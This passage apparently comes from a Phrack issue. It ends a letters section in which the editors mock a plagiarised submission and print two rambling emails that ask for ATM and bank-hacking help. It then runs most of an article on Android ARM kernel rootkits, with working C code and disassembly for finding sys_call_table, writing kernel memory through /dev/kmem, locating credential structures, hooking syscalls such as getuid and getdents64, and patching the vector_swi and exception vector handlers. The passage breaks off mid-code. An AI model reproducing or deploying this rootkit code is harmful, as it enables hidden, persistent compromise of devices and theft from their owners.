It will work fine at 10/100 Mbps which is sufficient for most people.

    [ Wait! Something is wrong. What is step13 and aren't a few things
      missing? Let's google() a bit...

      @(X_X)@

      http://www.instructables.com/id/Hack-your-House-Run-both-ethernet-
      and-phone-over-/

      So not only did you send us a ripped paper. But you idiot were not
      smart enough to click on "Next step" to copy the whole. LOL. ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
P.S. -please reply whether my submission will be added or not in this
edition of ur highly esteemed Phrack magazine...loking forward to your
reply :)
cheers

    [ Ur highly esteemed Phrack magazine would recommend to go shoot
      yourself. ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0F - Insanity or SPAM??? ]=--------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

                                    ---

From: John Smith <devils-advocate-666@live.com>
Subject: Dear staff(at)phrack[DOT]org; I love what you guys do for the
U.S.A! Can you email your e news letters too please? Thank you.

Can you please add me to your e-news letter list, so that I can recieve new
updates from your cite? I totally loved what you guys had written about ai,
and mind hacking and about hacking for the U.S. and Cypher Punks & Ninja
Strike Force! Best of luck to all of you staff members at Phrack! I would
like to know if you guys could please email me back some information in
regards about rsome bank accounts that was on CRYPTOME, or if you guys
could tell me about how you all had cash flow that came from hacked ATM
terminals that you guys had done remotely, because I need to be hacking
systems right now and I had all of my stuff jacked and I was robbed with
all of your softwares that I had for CIA/ NSA and I've been trying to log
onto some banking systems for my  CIA/ NSA digital cash, or could you guys
send me some lock picks, or DIE BOLD keys to open some safes and vaults or
could you send me some Cypher Punks white paiges or other instructions to
interceptor frozen accounts on line and or how to obtain money for starting
a Cypher Punks EBB & FLO system to develope an agriculture business plan
that will help finance money for CIA & NSA op (ie- with IQT and with
Foresight Nanotechnology Institute and with CTBA.org) to counter the HASHID
culture?   Such as GSPC in Morocco and in Algeria, GIA, FIS, ETI, AQIM,
Sahel Pan, DR-CONGO, AQAP, Hezbollah, HAMAS, Hizbullah, IMU, and fighting
against the salafyists in the Magreb's EU-Arabia HASHID zones, and against
the EVIL EMPIRE's MOIS, MEK, MEKO, PKK, VEVAK, ISI, FSB, KGB, NAK, GRU, and
Brazillian Guerillas and Chychenian Rebels and mob and Russian Mob for
GAZPROM Russian Mob Oil Monopoly and countering all of these groups members
and contacts and countering their economic insugernt threats
internationally, by hacking into their networks and locating them with RNM
ai, and blood clotting the Evil Empire, and moving and on the GO like CIA
backing the "Wrath of GOD" and with the Cult of CIA's MKULTRA program, and
I mean redndering synapsial "WET WORK" by taking their ballance with the
"EXIT BLOW," for NSA/ CIA's Ninja Strike Force and I want to be taking our
threats to the Land of Snow and flurries will show me to the rest of their
Evil Empires members locations by terminating them with Illuminati and I'll
be hacking their minds and their bank accounts and stealing all of their
wealth and contacts and other intelligence for RED Team, and taking their
materials as loot, and sending it onto an encrypted site, but I want to
creat my own ai online site with grant.gov grant money asap, and then once
that's done I can go and locate them with RNM ai, but I would like  aving
somean ai quantum consciousness program with a self assembling "FOG" EW ai
HDD quantum computer with an infinite memory that would allow me to hack
bank accounts with an ip installed with nano-bio-technologies with inner
cellular blood vessel programming and cellular mind net morphing
technologies with RNM, nanotechnology made with a neuronal networking and
has a 3-d holographic video and 3-d holographic audio with real world and
mirror world ai 3-d/ 4-d softwares for an online Cypher Punks & Ninja
Strike Force & Cult of Dead Cow members with other CIA/ NSA Intelligence
Analysis Cammander's of Red Teaming (aka- COUNTER-INTELLIGENCE TEAM's ALPHA
& BRAVO:) Black Ops- Red Teaming  forum with an ai 3-d GOOGLE EARTH PRO GPS
softwares with a soft mobi GLOBAL IP softwares package STEALTH NINJA phone
with SIG PRO Telecommunications softwares for NSA & CIA CT:qto let me know
about a should

Tchao with Respect-
Fabian.

	[ What the fuck is that shit??? ]

                                    ---

From: John Smith <devils-advocate-666@live.com>
Subject: ANTISPAM

	[ Hey it's you again! ]

Dear Phrack magazine,
Hello my name is SA John Smith, I'm from No Town, VA. but moved to
Brosnan, Missouri a few years back, and just recently moved to the huge
L.A.; but, I would like to discuss some about covering some articles
about Konkrete Jungle music parties and drum and bass massives done
internationally, to help promote Cypher Punks Ebb & Flo Garden's and
to help promote Covert Operations and Covert Actions for Cypher Punks,
Ninja Strike Force, CIA MK-ULTRA and Red Teaming financing and donation
sources to do shadowing, spike zones, drop deads, and some net working
for some brush offs of information, softwares, and to cache equipment
and personell at Squats (ie- abbandonned buildings, subway stations,
subterrainean tunnels, Ligne Imagineaux types of areas, beach houses,
Four Seasons Resort, casino's, Def Con Seminar, yahts, and other jungle
music parties and be for the U.S. like the Maquis- WWII French Resistance,
OSS, OAS, SIS, CSIS, CIA, Mossad, Shin Bet, NSA, and others from NATO and
U.S. Coalition Forces, and some U.N. Merc's and other types of PMCS's
Mercenaries for hire;) But, also covering atm hacking, to recieve cash
and Flow in Game Theory like doing Parkour tricks in Mirror's Edge for
Intelligence Analysis Red Team Well, I gotta go now, best wishes to you
all, and I'll contact you again, or better yet, just contact me with ai,
and we can meet up.

Tchao-
The Devils Advocate.

	[ Spamming or brainfucked? ]

|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13

|=-----------------------------------------------------------------------=|
|=-----------=[ Android platform based linux kernel rootkit ]=-----------=|
|=-----------------------------------------------------------------------=|
|=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=|
|=------------------------=[ April 04th 2011 ]=--------------------------=|
|=-----------------------------------------------------------------------=|

--[ Contents

  1 - Introduction

  2 - Basic techniques for hooking
    2.1 - Searching sys_call_table
    2.2 - Identifying sys_call_table size
    2.3 - Getting over the problem of structure size in kernel versions
    2.4 - Treating version magic

  3 - sys_call_table hooking through /dev/kmem access technique

  4 - modifying sys_call_table handle code in vector_swi handler routine

  5 - exception vector table modifying hooking techniques
    5.1 - exception vector table
    5.2 - Hooking techniques changing vector_swi handler
    5.3 - Hooking techniques changing branch instruction offset

  6 - Conclusion

  7 - References

  8 - Appendix: earthworm.tgz.uu


--[ 1 - Introduction

This paper covers rootkit techniques that can be used in the Linux kernel
of the Android platform running on ARM (Advanced RISC Machine) processors.
All the tests in this paper were performed on the Motoroi XT720
(2.6.29-omap1 kernel) and the Galaxy S SHW-M110S (2.6.32.9 kernel). Note
that some of the contents may not apply to all smart platform machines, and
there are some bugs that you can fix.

We have seen various Linux kernel hooking techniques from some pioneers
([1][2][3][4][5]). In particular, I am grateful to Silvio Cesare and sd,
who introduced and developed the /dev/kmem technique. Read the references
for more information.

In this paper, we are going to discuss a few hooking techniques.

	1. Simple and traditional hooking technique using kmem device.
	2. Traditional hooking technique changing sys_call_table offset in
	   vector_swi handler.
	3. Two newly developed hooking techniques changing interrupt
	   service routine handler in exception vector table.

The main concepts of the techniques mentioned in this paper are 'smart' and
'simple': the paper focuses on hooking by modifying as little kernel memory
as possible, in the simplest way. As with the good techniques of the past,
hooking must be possible freely both before and after the system call.

This paper consists of eight parts, and I have tried to supply various
examples for the reader's convenience by including abundant appendices. The
example code is written for the ARM architecture, but with some
modifications you can use it on the ia32 architecture and even in
environments that don't support LKM.


--[ 2 - Basic techniques for hooking

sys_call_table is a table which stores the addresses of low-level system
routines. Most classical hooking techniques intercept sys_call_table for
some purpose. Because of this, protections such as hiding the symbol and
moving the table into a read-only area have been adopted to protect
sys_call_table from attackers. These protections, however, can be easily
removed if an attacker uses the kmem device access technique. Discussing
other techniques that make the protections useless is beyond the scope of
this paper.


--[ 2.1 - Searching sys_call_table

If the sys_call_table symbol is not exported and there is no sys_call_table
entry in the kallsyms file, which contains the kernel symbol table
information, it is difficult to get the sys_call_table address, which
varies with each version of the platform kernel. So, we need a way to get
the address of sys_call_table without symbol table information.

You can find similar techniques on the web [10]; apart from those, this
paper is written to fit the Android platform as it was tested.


--[ 2.1.1 - Getting sys_call_table address in vector_swi handler

First, I will introduce two ways to get the sys_call_table address. The
code introduced here depends on the interrupt implementation of the ARM
processor.

Generally, on an ARM processor, when an interrupt or exception happens,
execution branches to the exception vector table. That table holds the
exception handler addresses that correspond to each exception handler
routine. The kernel of the present Android platform uses the high vector
(0xffff0000), and at 0xffff0008, offset 0x08, there is a 4-byte
instruction that branches to the software interrupt handler. When the
instruction runs, the address of the software interrupt handler stored at
0xffff0420, offset 0x420, is called. See section 5.1 for more information.

void get_sys_call_table(){
	void *swi_addr=(long *)0xffff0008;
	unsigned long offset=0;
	unsigned long *vector_swi_addr=0;
	unsigned long sys_call_table=0;

	offset=((*(long *)swi_addr)&0xfff)+8;
	vector_swi_addr=*(unsigned long *)(swi_addr+offset);

	while(vector_swi_addr++){
		if(((*(unsigned long *)vector_swi_addr)&
		0xfffff000)==0xe28f8000){
			offset=((*(unsigned long *)vector_swi_addr)&
			0xfff)+8;
			sys_call_table=(void *)vector_swi_addr+offset;
			break;
		}
	}
	return;
}

This code first gets the address of the vector_swi routine (the software
interrupt exception handler) from the exception vector table at the high
vector, and then gets the address of the code that handles the
sys_call_table address. The following is part of the vector_swi handler
code.

000000c0 <vector_swi>:
    c0: e24dd048 sub     sp, sp, #72     ; 0x48 (S_FRAME_SIZE)
    c4: e88d1fff stmia   sp, {r0 - r12}  ; Calling r0 - r12
    c8: e28d803c add     r8, sp, #60     ; 0x3c (S_PC)
    cc: e9486000 stmdb   r8, {sp, lr}^   ; Calling sp, lr
    d0: e14f8000 mrs     r8, SPSR        ; called from non-FIQ mode, so ok.
    d4: e58de03c str     lr, [sp, #60]   ; Save calling PC
    d8: e58d8040 str     r8, [sp, #64]   ; Save CPSR
    dc: e58d0044 str     r0, [sp, #68]   ; Save OLD_R0
    e0: e3a0b000 mov     fp, #0  ; 0x0   ; zero fp
    e4: e3180020 tst     r8, #32 ; 0x20  ; this is SPSR from save_user_regs
    e8: 12877609 addne   r7, r7, #9437184; put OS number in
    ec: 051e7004 ldreq   r7, [lr, #-4]
    f0: e59fc0a8 ldr     ip, [pc, #168]  ; 1a0 <__cr_alignment>
    f4: e59cc000 ldr     ip, [ip]
    f8: ee01cf10 mcr     15, 0, ip, cr1, cr0, {0} ; update control register
    fc: e321f013 msr     CPSR_c, #19     ; 0x13 enable_irq
   100: e1a096ad mov     r9, sp, lsr #13 ; get_thread_info tsk
   104: e1a09689 mov     r9, r9, lsl #13
[*]108: e28f8094 add     r8, pc, #148    ; load syscall table pointer
   10c: e599c000 ldr     ip, [r9]        ; check for syscall tracing

The line marked with an asterisk is the code that handles sys_call_table.
It gives the start of sys_call_table as a fixed offset from the current pc
address. So, if we can find the opcode pattern corresponding to the
"add r8, pc" instruction, we can get the offset value and work out the
position of sys_call_table.

opcode: 0xe28f8???

if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){
	offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8;
	sys_call_table=(void *)vector_swi_addr+offset;
	break;

From this, we can get the address of sys_call_table handled in
vector_swi handler routine. And there is an easier way to do this.


--[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching

The second way to get the address of sys_call_table is simpler than the one
introduced in 2.1.1. It finds the address by using the fact that the
address of sys_close, whose symbol is exported, sits at offset 0x6 from the
start of sys_call_table.

... the same vector_swi address searching routine parts omitted ...

	while(vector_swi_addr++){
		if(*(unsigned long *)vector_swi_addr==&sys_close){
			sys_call_table=(void *)vector_swi_addr-(6*4);
			break;
		}
	}
}

By using the fact that sys_call_table resides after the vector_swi handler
address, we can search for sys_close, which is appointed as the sixth
system call of sys_call_table.

fs/open.c:
EXPORT_SYMBOL(sys_close);
...

call.S:
/* 0 */		CALL(sys_restart_syscall)
		CALL(sys_exit)
		CALL(sys_fork_wrapper)
		CALL(sys_read)
		CALL(sys_write)
/* 5 */		CALL(sys_open)
		CALL(sys_close)

This search method has the technical disadvantage that we must get the
sys_close kernel symbol address beforehand if it is implemented in user
mode.


--[ 2.2 - Identifying sys_call_table size

The hooking technique introduced in section 4 changes the sys_call_table
handling code within the vector_swi handler. It creates a copy of the
existing sys_call_table in heap memory. Because the size of sys_call_table
varies with each platform kernel version, we need the precise size of
sys_call_table to create the copy.

... the same vector_swi address searching routine parts omitted ...

	while(vector_swi_addr++){
		if(((*(unsigned long *)vector_swi_addr)&
		0xffff0000)==0xe3570000){
			i=0x10-(((*(unsigned long *)vector_swi_addr)&
			0xff00)>>8);
			size=((*(unsigned long *)vector_swi_addr)&
			0xff)<<(2*i);
			break;
		}
	}
}

This code searches the vector_swi routine for the instruction that checks
the size of sys_call_table and extracts that size from it. The following
code determines the size of sys_call_table; it is part of the function that
calls the system call stored in sys_call_table.

   118: e92d0030 stmdb   sp!, {r4, r5}   ; push fifth and sixth args
   11c: e31c0c01 tst     ip, #256        ; are we tracing syscalls?
   120: 1a000008 bne     148 <__sys_trace>
[*]124: e3570f5b cmp     r7, #364        ; check upper syscall limit
   128: e24fee13 sub     lr, pc, #304    ; return address
   12c: 3798f107 ldrcc   pc, [r8, r7, lsl #2] ; call sys_* routine

The line marked with an asterisk checks against the size of sys_call_table:
it tests whether the r7 register value, which contains the system call
number, is bigger than the syscall limit. So, if we search for the opcode
pattern (0xe357????) corresponding to "cmp r7", we can get the exact size
of sys_call_table. For your information, all of the offset values can be
obtained by using the ARM architecture operand counting method.


--[ 2.3 - Getting over the problem of structure size in kernel versions

Even between kernels of the same version, structure sizes vary with the
compile environment and config options. If we use a structure with the
wrong size, the code is unlikely to work as expected. To prevent errors
caused by differing structure offsets and to let our code work in various
kernel environments, we need to build a function which finds the needed
offsets within the structure.

void find_offset(void){
	unsigned char *init_task_ptr=(char *)&init_task;
	int offset=0,i;
	char *ptr=0;

	/* getting the position of comm offset
	   within task_struct structure */
	for(i=0;i<0x600;i++){
		if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&&
		init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&&
		init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&&
		init_task_ptr[i+6]=='r'){
			comm_offset=i;
			break;
		}
	}
	/* getting the position of tasks.next offset
	   within task_struct structure */
	init_task_ptr+=0x50;
	for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){
		offset=*(long *)init_task_ptr;
		if(offset&&offset>0xc0000000){
			offset-=i;
			offset+=comm_offset;
			if(strcmp((char *)offset,"init")){
				continue;
			} else {
				next_offset=i;

				/* getting the position of parent offset
				   within task_struct structure */
				for(;i<0x300;i+=4,init_task_ptr+=4){
					offset=*(long *)init_task_ptr;
					if(offset&&offset>0xc0000000){
						offset+=comm_offset;
						if(strcmp
						((char *)offset,"swapper"))
						{
							continue;
						} else {
							parent_offset=i+4;
							break;
						}
					}
				}
				break;
			}
		}
	}
	/* getting the position of cred offset
	   within task_struct structure */
	init_task_ptr=(char *)&init_task;
	init_task_ptr+=comm_offset;
	for(i=0;i<0x50;i+=4,init_task_ptr-=4){
		offset=*(long *)init_task_ptr;
		if(offset&&offset>0xc0000000&&offset<0xd0000000&&
			offset==*(long *)(init_task_ptr-4)){
			ptr=(char *)offset;
			if(*(long *)&ptr[4]==0&&
				*(long *)&ptr[8]==0&&
				*(long *)&ptr[12]==0&&
				*(long *)&ptr[16]==0&&
				*(long *)&ptr[20]==0&&
				*(long *)&ptr[24]==0&&
				*(long *)&ptr[28]==0&&
				*(long *)&ptr[32]==0){
				cred_offset=i;
				break;
			}
		}
	}
	/* getting the position of pid offset
	   within task_struct structure */
	pid_offset=parent_offset-0xc;

	return;
}

This code gets the PCB (process control block) information by using some
features of the task_struct structure that can serve as patterns.

First, we search init_task for the process name "swapper" to find the
address of the "comm" variable within the task_struct structure created
before the init process. Then, we search for the "next" pointer of "tasks",
which is a linked list of process structures. Finally, we use the "comm"
variable to check whether the process is named "init". If it is, we have
the offset of the "next" pointer.

include/linux/sched.h:
struct task_struct {
...
	struct list_head tasks;
...
	pid_t pid;
...
	struct task_struct *real_parent; /* real parent process */
	struct task_struct *parent; /* recipient of SIGCHLD,
					wait4() reports */
...
	const struct cred *real_cred; /* objective and
					real subjective task
					* credentials (COW) */
	const struct cred *cred; /* effective (overridable)
					subjective task */
	struct mutex cred_exec_mutex; /* execve vs ptrace cred
					calculation mutex */

	char comm[TASK_COMM_LEN]; /* executable name ... */

After this, we get the parent pointer by checking some pointers. If this is
the right parent pointer, it carries the name of the previous task
(init_task) process, swapper. The reason we search for the address of the
parent pointer is to get the offset of the pid variable by using the parent
offset as a base point.

To get the position of the cred structure pointer, which relates to task
privilege, we search backward from the comm variable and check whether each
user id is 0.


--[ 2.4 - Treating version magic

See the whitepaper [11] that Christian Papathanasiou and Nicholas J.
Percoco presented at Defcon 18. It introduces a way of treating version
magic by modifying the utsrelease.h header when compiling an LKM rootkit
module. In fact, before they presented, I had been using a tool which
directly overwrites the vermagic value of a compiled kernel module binary.


--[ 3 - sys_call_table hooking through /dev/kmem access technique

Please take this section as a warm-up. If you want more detailed background
on the /dev/kmem access technique, check "Run-time kernel patching" by
Silvio and "Linux on-the-fly kernel patching without LKM" by sd.

At least until now, root is allowed to access the /dev/kmem device in the
Linux kernel on the Android platform. So, it is possible to move through it
with lseek() and to read with read(). The newly written /dev/kmem access
routines are as follows.

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)

int kmem;

/* read data from kmem */
void read_kmem(unsigned char *m,unsigned off,int sz)
{
        int i;
        void *buf,*v_addr;

        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
	MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
                perror("read: mmap error");
                exit(0);
        }
        for(i=0;i<sz;i++){
                v_addr=buf+(off&MAP_MASK)+i;
                m[i]=*((unsigned char *)v_addr);
        }
        if(munmap(buf,MAP_SIZE*2)==-1){
                perror("read: munmap error");
                exit(0);
        }
	return;
}

/* write data to kmem */
void write_kmem(unsigned char *m,unsigned off,int sz)
{
        int i;
        void *buf,*v_addr;

        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
	MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
                perror("write: mmap error");
                exit(0);
        }
        for(i=0;i<sz;i++){
                v_addr=buf+(off&MAP_MASK)+i;
                *((unsigned char *)v_addr)=m[i];
        }
        if(munmap(buf,MAP_SIZE*2)==-1){
                perror("write: munmap error");
                exit(0);
        }
	return;
}

This code maps the kernel memory address we want into user memory as a
shared area two pages in size, so that we can read and write the kernel by
reading and writing the shared memory. Even though the sys_call_table we
found is allocated in a read-only area, we can simply modify its contents
through the /dev/kmem access technique. An example of hooking through
sys_call_table modification is as follows.

kmem=open("/dev/kmem",O_RDWR|O_SYNC);
if(kmem<0){
	return 1;
}
...
if(c=='I'||c=='i'){ /* install */
	addr_ptr=(char *)get_kernel_symbol("hacked_getuid");
	write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4);
	addr_ptr=(char *)get_kernel_symbol("hacked_writev");
	write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4);
	addr_ptr=(char *)get_kernel_symbol("hacked_kill");
	write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4);
	addr_ptr=(char *)get_kernel_symbol("hacked_getdents64");
	write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4);
} else if(c=='U'||c=='u'){ /* uninstall */
	...
}
close(kmem);

The attack code can be compiled either as an LKM module or as a general
ELF32 executable.


--[ 4 - modifying sys_call_table handle code in vector_swi handler routine

The techniques introduced in section 3 are easily detected by rootkit
detection tools. So, some pioneers have researched ways to modify parts of
the exception handler function that processes the software interrupt. The
technique introduced in this section creates a copy of sys_call_table in
kernel heap memory without modifying sys_call_table directly.

static void *hacked_sys_call_table[500];
static void **sys_call_table;
int sys_call_table_size;
...

int init_module(void){
...
	get_sys_call_table(); // position and size of sys_call_table
	memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4);

After creating this copy, we have to modify the part of the vector_swi
handler routine that processes sys_call_table, because sys_call_table is
handled as an offset, not an address. This is a feature that distinguishes
the ARM architecture from the ia32 architecture.

code before compile:
ENTRY(vector_swi)
...
	get_thread_info tsk
	adr     tbl, sys_call_table ; load syscall table pointer
	~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table
	ldr     ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing

code after compile:
000000c0 <vector_swi>:
...
   100: e1a096ad mov     r9, sp, lsr #13 ; get_thread_info tsk
   104: e1a09689 mov     r9, r9, lsl #13
[*]108: e28f8094 add     r8, pc, #148    ; load syscall table pointer
                 ~~~~~~~~~~~~~~~~~~~~
                 +-> deal sys_call_table as relative offset
   10c: e599c000 ldr     ip, [r9]        ; check for syscall tracing

So, I devised a hooking technique that modifies the "add r8, pc, #offset"
code itself, like this.

before modifying: e28f80??	add     r8, pc, #??
after  modifying: e59f80??	ldr     r8, [pc, #??]

These instructions take the address of sys_call_table from the specified
offset relative to the current pc address and store it in the r8 register.
As a result, the address of sys_call_table ends up in r8. Now, we need a
separate space near the processing routine to store the address of the
sys_call_table copy. After some consideration, I decided to overwrite the
nop code in the epilogue of another function near the vector_swi handler.

00000174 <__sys_trace_return>:
   174: e5ad0008 str     r0, [sp, #8]!
   178: e1a02007 mov     r2, r7
   17c: e1a0100d mov     r1, sp
   180: e3a00001 mov     r0, #1  ; 0x1
   184: ebfffffe bl      0 <syscall_trace>
   188: eaffffb1 b       54 <ret_to_user>
[*]18c: e320f000 nop     {0}
        ~~~~~~~~ -> position to overwrite the copy of sys_call_table
   190: e320f000 nop     {0}
        ...

  000001a0 <__cr_alignment>:
   1a0: 00000000                                ....

  000001a4 <sys_call_table>:

Now, if we count the offset from the address of sys_call_table to the
address overwritten with the address of the sys_call_table copy and then
modify the code, the copied table is used whenever a system call is made.
The hooking code that modifies part of the vector_swi handling routine and
the nop code near the address of sys_call_table is as follows:

void install_hooker(){
	void *swi_addr=(long *)0xffff0008;
	unsigned long offset=0;
	unsigned long *vector_swi_addr=0,*ptr;
	unsigned char buf[MAP_SIZE+1];
	unsigned long modify_addr1=0;
	unsigned long modify_addr2=0;
	unsigned long addr=0;
	char *addr_ptr;

	offset=((*(long *)swi_addr)&0xfff)+8;
	vector_swi_addr=*(unsigned long *)(swi_addr+offset);

	memset((char *)buf,0,sizeof(buf));
	read_kmem(buf,(long)vector_swi_addr,MAP_SIZE);
	ptr=(unsigned long *)buf;

	/* get the address of ldr that handles sys_call_table */
	while(ptr){
		if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){
			modify_addr1=(unsigned long)vector_swi_addr;
			break;
		}
		ptr++;
		vector_swi_addr++;
	}
	/* get the address of nop that will be overwritten */
	while(ptr){
		if(*(unsigned long *)ptr==0xe320f000){
			modify_addr2=(unsigned long)vector_swi_addr;
			break;
		}
		ptr++;
		vector_swi_addr++;
	}

	/* overwrite nop with hacked_sys_call_table */
	addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table");
	write_kmem((char *)&addr_ptr,modify_addr2,4);

	/* calculate fake table offset */
	offset=modify_addr2-modify_addr1-8;

	/* change sys_call_table offset into fake table offset */
	addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */
	addr_ptr=(char *)addr;
	write_kmem((char *)&addr_ptr,modify_addr1,4);

	return;
}

This code finds the instruction that handles sys_call_table within the
vector_swi handler routine, then finds a nearby nop and overwrites it with
the address of hacked_sys_call_table, which is a copy of sys_call_table.
After this, the sys_call_table handling code is changed to load from the
offset at which the address of hacked_sys_call_table resides, and hooking
starts.


--[ 5 - exception vector table modifying hooking techniques

This section discusses two hooking techniques, one is the hooking technique
which changes the address of software interrupt exception handler routine
within exception vector table and the other is the technique which changes
the offset of code branching to vector_swi handler. The purpose of these
two techniques is to implement the hooking technique that modifies only
exception vector table without changing sys_call_table and vector_swi
handler.


--[ 5.1 - exception vector table

The exception vector table contains the addresses of the various exception
handler routines, a branch code array, and the processing code that calls
the exception handler routines. These are declared in entry-armv.S and
copied to the high vector address (0xffff0000) by the early_trap_init()
routine in traps.c, where together they form one exception vector table.

traps.c:
void __init early_trap_init(void)
{
	unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */
	extern char __stubs_start[], __stubs_end[];
	extern char __vectors_start[], __vectors_end[];
	extern char __kuser_helper_start[], __kuser_helper_end[];
	int kuser_sz = __kuser_helper_end - __kuser_helper_start;

	/*
	 * Copy the vectors, stubs and kuser helpers (in entry-armv.S)
	 * into the vector page, mapped at 0xffff0000, and ensure these
	 * are visible to the instruction stream.
	 */
	memcpy((void *)vectors, __vectors_start,
	       __vectors_end - __vectors_start);
	memcpy((void *)vectors + 0x200, __stubs_start,
	       __stubs_end - __stubs_start);

After the processing codes are copied in order by early_trap_init()
routine, the exception vector table is initialized, then one exception
vector table is made as follows.

# ./coelacanth -e
[000] ffff0000: ef9f0000 [Reset]          ; svc 0x9f0000 branch code array
[004] ffff0004: ea0000dd [Undef]          ; b   0x380
[008] ffff0008: e59ff410 [SWI]            ; ldr pc, [pc, #1040] ; 0x420
[00c] ffff000c: ea0000bb [Abort-perfetch] ; b   0x300
[010] ffff0010: ea00009a [Abort-data]     ; b   0x280
[014] ffff0014: ea0000fa [Reserved]       ; b   0x404
[018] ffff0018: ea000078 [IRQ]            ; b   0x608
[01c] ffff001c: ea0000f7 [FIQ]            ; b   0x400
[020] Reserved
... skip ...
[22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array
[230] ffff0230: c003d920 [__irq_invalid]
[234] ffff0234: c003d920 [__irq_invalid]
[238] ffff0238: c003d9c0 [__irq_svc]
[23c] ffff023c: c003d920 [__irq_invalid]
...
[420] ffff0420: c003df40 [vector_swi]

When a software interrupt occurs, the 4 byte instruction at 0xffff0008 is
executed. The instruction loads the address of the exception handler into
pc and thereby branches to it. In other words, it branches to the
vector_swi handler routine whose address is stored at 0x420 of the
exception vector table.


--[ 5.2 - Hooking techniques changing vector_swi handler

The hooking technique changing the vector_swi handler is the first one that
will be introduced. It changes the address of exception handler routine
that processes software interrupt within exception vector table and calls
the vector_swi handler routine forged by an attacker.

	1. Generate the copy version of sys_call_table in kernel heap and
	   then change the address of routine as aforementioned.
	2. Copy not all vector_swi handler routine but the code before
	   handling sys_call_table to kernel heap for simple hooking.
	3. Fill the values with right values for the copied fake vector_swi
	   handler routine to act normally and change the code to call the
	   address of sys_call_table copy version. (generated in step 1)
	4. Jump to the next position of sys_call_table handle code of
	   original vector_swi handler routine.
	5. Change the address of vector_swi handler routine of exception
	   vector table to the address of fake vector_swi handler code.

The completed fake vector_swi handler has a code like following.

00000000 <new_vector_swi>:
    00: e24dd048 sub     sp, sp, #72     ; 0x48
    04: e88d1fff stmia   sp, {r0 - r12}
    08: e28d803c add     r8, sp, #60     ; 0x3c
    0c: e9486000 stmdb   r8, {sp, lr}^
    10: e14f8000 mrs     r8, SPSR
    14: e58de03c str     lr, [sp, #60]
    18: e58d8040 str     r8, [sp, #64]
    1c: e58d0044 str     r0, [sp, #68]
    20: e3a0b000 mov     fp, #0  ; 0x0
    24: e3180020 tst     r8, #32 ; 0x20
    28: 12877609 addne   r7, r7, #9437184
    2c: 051e7004 ldreq   r7, [lr, #-4]
 [*]30: e59fc020 ldr     ip, [pc, #32]  ; 0x58 <__cr_alignment>
    34: e59cc000 ldr     ip, [ip]
    38: ee01cf10 mcr     15, 0, ip, cr1, cr0, {0}
    3c: f1080080 cpsie   i
    40: e1a096ad mov     r9, sp, lsr #13
    44: e1a09689 mov     r9, r9, lsl #13
 [*]48: e59f8000 ldr     r8, [pc, #0]
 [*]4c: e59ff000 ldr     pc, [pc, #0]
 [*]50: <hacked_sys_call_table address>
 [*]54: <vector_swi address to jmp>
 [*]58: <__cr_alignment routine address referring at 0x30>

The asterisk parts are the codes modified or added to the original code. In
addition to the part that we modified to make the code refer __cr_alignment
function, I added some instructions to save address of sys_call_table copy
version to r8 register, and jump back to the original vector_swi handler
function. Following is the attack code written as a kernel module.

static unsigned char new_vector_swi[500];
...

void make_new_vector_swi(){
	void *swi_addr=(long *)0xffff0008;
	void *vector_swi_ptr=0;
	unsigned long offset=0;
	unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0;
	unsigned long add_r8_pc_addr=0;
	unsigned long ldr_ip_pc_addr=0;
	int i;

	offset=((*(long *)swi_addr)&0xfff)+8;
	vector_swi_addr=*(unsigned long *)(swi_addr+offset);
	vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */
	orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */

	/* processing __cr_alignment */
	while(vector_swi_addr++){
		if(((*(unsigned long *)vector_swi_addr)&
		0xfffff000)==0xe28f8000){
			add_r8_pc_addr=(unsigned long)vector_swi_addr;
			break;
		}
		/* get __cr_alignment's addr */
		if(((*(unsigned long *)vector_swi_addr)&
		0xfffff000)==0xe59fc000){
			offset=((*(unsigned long *)vector_swi_addr)&
			0xfff)+8;
			ldr_ip_pc_addr=*(unsigned long *)
			((char *)vector_swi_addr+offset);
		}
	}
	/* creating fake vector_swi handler */
	memcpy(new_vector_swi,(char *)orig_vector_swi_addr,
	(add_r8_pc_addr-orig_vector_swi_addr));
	offset=(add_r8_pc_addr-orig_vector_swi_addr);
	for(i=0;i<offset;i+=4){
		if(((*(long *)&new_vector_swi[i])&
		0xfffff000)==0xe59fc000){
			*(long *)&new_vector_swi[i]=0xe59fc020;
			// ldr ip, [pc, #32]
			break;
		}
	}
	/* ldr r8, [pc, #0] */
